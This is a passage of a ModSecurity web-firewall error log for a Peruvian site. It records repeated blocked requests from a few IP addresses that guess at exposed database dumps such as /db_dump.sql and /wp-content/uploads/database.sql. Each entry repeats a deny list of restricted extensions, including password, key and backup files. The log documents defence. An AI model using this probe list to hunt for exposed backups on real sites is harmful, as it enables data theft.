.htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2.sql"] [unique_id "ZoqxG3ug2jzbr_AlO3dxsQAAANY"] [Sun Jul 07 10:15:41.750355 2024] [:error] [pid 30828:tid 139722575791872] [client 204.137.14.106:33192] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-peru.sql"] [unique_id "ZoqxHTbJWLg2ecbngu9HzQAAAIs"] [Sun Jul 07 10:15:43.564693 2024] [:error] [pid 30828:tid 139722659718912] [client 204.137.14.106:33194] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nperu-2022.sql"] [unique_id "ZoqxHzbJWLg2ecbngu9HzgAAAIE"] [Sun Jul 07 10:15:44.362100 2024] [:error] [pid 30828:tid 139722567399168] [client 204.137.14.106:33196] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vestigacionperu-2022.sql"] [unique_id "ZoqxIDbJWLg2ecbngu9HzwAAAIw"] [Sun Jul 07 10:15:45.194132 2024] [:error] [pid 31926:tid 139722575791872] [client 204.137.14.106:33198] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/localhost.sql"] [unique_id "ZoqxIXug2jzbr_AlO3dxsgAAAMs"] [Sun Jul 07 10:15:46.008832 2024] [:error] [pid 30828:tid 139722617755392] [client 204.137.14.106:33200] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-vestigacionperu.sql"] [unique_id "ZoqxIjbJWLg2ecbngu9H0AAAAIY"] [Sun Jul 07 10:15:46.966987 2024] [:error] [pid 30828:tid 139722634540800] [client 204.137.14.106:33202] [client 204.137.14.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wwwroot.sql"] [unique_id "ZoqxIjbJWLg2ecbngu9H0QAAAIQ"] [Sun Jul 07 10:15:47.559019 2024] [:error] [pid 30828:tid 139722542221056] [client 38.152.53.251:33204] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db_dump.sql"] [unique_id "ZoqxIzbJWLg2ecbngu9H0gAAAI8"] [Sun Jul 07 10:15:48.033451 2024] [:error] [pid 30828:tid 139722584184576] [client 38.152.53.251:33206] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ru_2023.sql"] [unique_id "ZoqxJDbJWLg2ecbngu9H0wAAAIo"] [Sun Jul 07 10:15:48.503865 2024] [:error] [pid 30826:tid 139722626148096] [client 38.152.53.251:33208] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023.sql"] [unique_id "ZoqxJPcO2IzqYGkif72oVQAAAAU"] [Sun Jul 07 10:15:48.930509 2024] [:error] [pid 30826:tid 139722525435648] [client 38.152.53.251:33210] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-tigacionperu.sql"] [unique_id "ZoqxJPcO2IzqYGkif72oVgAAABE"] [Sun Jul 07 10:15:49.316658 2024] [:error] [pid 30828:tid 139722668111616] [client 38.152.53.251:33212] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/u-2022.sql"] [unique_id "ZoqxJTbJWLg2ecbngu9H1AAAAIA"] [Sun Jul 07 10:15:49.749406 2024] [:error] [pid 30828:tid 139722475079424] [client 38.152.53.251:33214] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/stigacionperu_2023.sql"] [unique_id "ZoqxJTbJWLg2ecbngu9H1QAAAJc"] [Sun Jul 07 10:15:50.150612 2024] [:error] [pid 30828:tid 139722651326208] [client 38.152.53.251:33216] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/install.sql"] [unique_id "ZoqxJjbJWLg2ecbngu9H1gAAAII"] [Sun Jul 07 10:15:50.562268 2024] [:error] [pid 31926:tid 139722626148096] [client 38.152.53.251:33218] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_ru.sql"] [unique_id "ZoqxJnug2jzbr_AlO3dxswAAAMU"] [Sun Jul 07 10:15:50.958564 2024] [:error] [pid 30827:tid 139722600969984] [client 38.152.53.251:33220] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_investigacionperu.sql"] [unique_id "ZoqxJkGuaLybMBNkB61tTgAAAEg"] [Sun Jul 07 10:15:51.376624 2024] [:error] [pid 31926:tid 139722609362688] [client 38.152.53.251:33222] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_nvestigacionperu.sql"] [unique_id "ZoqxJ3ug2jzbr_AlO3dxtAAAAMc"] [Sun Jul 07 10:15:51.784974 2024] [:error] [pid 30827:tid 139722500257536] [client 38.152.53.251:33224] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/cionperu_2023.sql"] [unique_id "ZoqxJ0GuaLybMBNkB61tTwAAAFQ"] [Sun Jul 07 10:15:52.238978 2024] [:error] [pid 31926:tid 139722642933504] [client 38.152.53.251:33226] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/database.sql"] [unique_id "ZoqxKHug2jzbr_AlO3dxtQAAAMM"] [Sun Jul 07 10:15:52.657737 2024] [:error] [pid 31926:tid 139722651326208] [client 38.152.53.251:33228] [client 38.152.53.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/temp.sql"] [unique_id "ZoqxKHug2jzbr_AlO3dxtgAAAMI"] [Sun Jul 07 10:15:53.063641 2024] [:error] [pid 30826:tid 139722609362688] [client 185.220.101.86:33230] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/member.sql"] [unique_id "ZoqxKfcO2IzqYGkif72oVwAAAAc"] [Sun Jul 07 10:15:53.518394 2024] [:error] [pid 30827:tid 139722466686720] [client 185.220.101.86:33232] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/gacionperu-2023.sql"] [unique_id "ZoqxKUGuaLybMBNkB61tUAAAAFg"] [Sun Jul 07 10:15:54.115204 2024] [:error] [pid 30828:tid 139722517042944] [client 185.220.101.86:33234] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-eru.sql"] [unique_id "ZoqxKjbJWLg2ecbngu9H1wAAAJI"] [Sun Jul 07 